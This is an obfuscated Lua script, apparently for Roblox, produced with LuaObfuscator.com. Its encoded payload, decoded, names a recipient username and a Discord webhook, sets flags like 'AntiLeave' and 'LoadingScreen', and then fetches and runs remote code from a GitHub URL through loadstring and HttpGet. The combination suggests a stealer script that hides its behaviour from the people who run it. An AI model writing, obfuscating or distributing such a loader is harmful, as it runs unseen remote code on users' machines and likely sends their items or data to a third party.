--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v96=v5(v71,v19);v19=nil;return v96;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v72-(v72%((810 -241) -((1432 -(68 + 997)) + 201))) ;else local v73=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -(1 + 2))) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (31011612 -14234396)) + (v41 * (120312 -54776)) + (v40 * (606 -(87 + (476 -213)))) + v39 ;end if (v38==((0 + 0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v38=(999 -(915 + 82)) -1 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,45 -24 ,6 + 25 );local v48=((v20(v44,56 -(454 -(44 + 386)) )==(1 + 0)) and  -1) or 1 ;if (v47==(791 -(368 + (1909 -(998 + 488))))) then if (v46==(0 -0)) then return v48 * (18 -(4 + 6 + 8)) ;else v47=3 -2 ;v45=442 -(416 + 26) ;end elseif (v47==(6535 -4488)) then return ((v46==0) and (v48 * ((1 + 0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/((2 + 0)^(490 -((917 -(201 + 571)) + (1431 -(116 + 1022))))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (0==v52) then v53=0 -0 ;v54=nil;v52=1822 -(1483 + 338) ;end if ((1696 -(1229 + 466))==v52) then v55=nil;v56=nil;v52=2;end if (v52~=(581 -(386 + 192))) then else v59=nil;while true do if (v53==2) then for v97=1,v23() do local v98=1206 -(696 + 510) ;local v99;local v100;local v101;while true do if (v98==(0 -0)) then v99=1262 -(1091 + 171) ;v100=nil;v98=1 + 0 ;end if (v98==(3 -2)) then v101=nil;while true do if (v99==0) then v100=0 -0 ;v101=nil;v99=1;end if (v99~=1) then else while true do if (v100~=(374 -(123 + 251))) then else v101=v21();if (v20(v101,1,1)==0) then local v169=0 -0 ;local v170;local v171;local v172;local v173;while true do if (v169==1) then v172=nil;v173=nil;v169=700 -(208 + 490) ;end if (v169==2) then while true do if (v170==0) then v171=v20(v101,2,1 + 2 );v172=v20(v101,4,3 + 3 );v170=837 -(660 + 176) ;end if ((1 + 1)~=v170) then else local v175=202 -(14 + 188) ;local v176;while true do if (v175~=0) then else v176=0;while true do if ((675 -(534 + 141))~=v176) then else local v183=0;while true do if (v183~=(0 + 0)) then else if (v20(v172,1 + 0 ,1 + 0 )==(1 -0)) then v173[2]=v59[v173[2 -0 ]];end if (v20(v172,5 -3 ,2 + 0 )==1) then v173[2 + 1 ]=v59[v173[3]];end v183=397 -(115 + 281) ;end if (v183==(2 -1)) then v176=1;break;end end end if (v176~=1) then else v170=3;break;end end break;end end end if (v170~=1) then else local v177=0;while true do if (v177==(1 + 0)) then v170=2;break;end if (v177==(0 -0)) then v173={v22(),v22(),nil,nil};if (v171==0) then local v181=0 -0 ;local v182;while true do if (v181==0) then v182=0;while true do if (v182~=(0 -0)) then else v173[3]=v22();v173[11 -7 ]=v22();break;end end break;end end elseif (v171==1) then v173[3]=v23();elseif (v171==2) then v173[288 -(134 + 151) ]=v23() -((1667 -(970 + 695))^(30 -14)) ;elseif (v171~=(1993 -(582 + 1408))) then else local v192=0;local v193;while true do if (v192~=(0 -0)) then else v193=0 -0 ;while true do if (v193~=(0 -0)) then else v173[3]=v23() -((1826 -(1195 + 629))^(20 -4)) ;v173[4]=v22();break;end end break;end end end v177=1;end end end if (3==v170) then if (v20(v172,3,3)==1) then v173[245 -(187 + 54) ]=v59[v173[4]];end v54[v97]=v173;break;end end break;end if (v169~=(780 -(162 + 618))) then else v170=0 + 0 ;v171=nil;v169=1;end end end break;end end break;end end break;end end end for v102=1 + 0 ,v23() do v55[v102-(1 -0) ]=v28();end return v57;end if (v53==1) then local v94=0 -0 ;while true do if (v94==(1 + 1)) then v53=2;break;end if (v94~=(1637 -(1373 + 263))) then else for v110=1,v58 do local v111=0;local v112;local v113;while true do if (v111~=1) then else if (v112==(1001 -(451 + 549))) then v113=v21()~=(0 + 0) ;elseif (v112==(2 -0)) then v113=v24();elseif (v112==(4 -1)) then v113=v25();end v59[v110]=v113;break;end if (v111==0) then local v124=1384 -(746 + 638) ;local v125;while true do if (v124~=(0 + 0)) then else v125=0;while true do if (0==v125) then local v174=0 -0 ;while true do if (v174~=(342 -(218 + 123))) then else v125=1;break;end if (v174==0) then v112=v21();v113=nil;v174=1;end end end if (v125~=(1582 -(1535 + 46))) then else v111=1;break;end end break;end end end end end v57[3]=v21();v94=2;end if (v94==(0 + 0)) then v58=v23();v59={};v94=1 + 0 ;end end end if ((560 -(306 + 254))==v53) then local v95=0 + 0 ;while true do if (v95==(1 -0)) then v56={};v57={v54,v55,nil,v56};v95=2;end if ((603 -(268 + 335))==v95) then local v109=0;while true do if (v109==(290 -(60 + 230))) then v54={};v55={};v109=573 -(426 + 146) ;end if (v109~=1) then else v95=1 + 0 ;break;end end end if (v95~=2) then else v53=1457 -(282 + 1174) ;break;end end end end break;end if (v52==(813 -(569 + 242))) then v57=nil;v58=nil;v52=3;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v77=v64;local v78=v65;local v79=v66;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=5) then if (v90<=2) then if (v90<=0) then local v114=0;local v115;while true do if (0==v114) then v115=v89[2];v87[v115]=v87[v115](v13(v87,v115 + 1 ,v82));break;end end elseif (v90>1) then v87[v89[2]][v89[3]]=v89[4];else v87[v89[2]]();end elseif (v90<=3) then v62[v89[3]]=v87[v89[2]];elseif (v90==4) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];else v87[v89[2]]=v89[3]~=0 ;end elseif (v90<=8) then if (v90<=6) then local v118=0;local v119;local v120;local v121;local v122;while true do if (2==v118) then for v166=v119,v82 do v122=v122 + 1 ;v87[v166]=v120[v122];end break;end if (v118==1) then v82=(v121 + v119) -1 ;v122=0;v118=2;end if (v118==0) then v119=v89[2];v120,v121=v80(v87[v119](v13(v87,v119 + 1 ,v89[3])));v118=1;end end elseif (v90==7) then v87[v89[2]]=v89[3];else v87[v89[2]]=v62[v89[3]];end elseif (v90<=9) then do return;end elseif (v90==10) then local v139=v89[2];local v140=v87[v89[3]];v87[v139 + 1 ]=v140;v87[v139]=v140[v89[4]];else local v144;local v145,v146;local v147;local v148;v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v148=v89[2];v147=v87[v89[3]];v87[v148 + 1 ]=v147;v87[v148]=v147[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3]~=0 ;v81=v81 + 1 ;v89=v77[v81];v148=v89[2];v145,v146=v80(v87[v148](v13(v87,v148 + 1 ,v89[3])));v82=(v146 + v148) -1 ;v144=0;for v163=v148,v82 do v144=v144 + 1 ;v87[v163]=v145[v144];end v81=v81 + 1 ;v89=v77[v81];v148=v89[2];v87[v148]=v87[v148](v13(v87,v148 + 1 ,v82));v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];do return;end end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503083O005A652O6E3233343503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303735333730373631392O3238343732332F6A64702D6C5F36444C6E57457A5772416A5A71754337474F6F652O79644F65784E526F57747765595355476B506F33456C48575831572D6E5945776C677547522O43346303093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012083O00063O00300B3O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
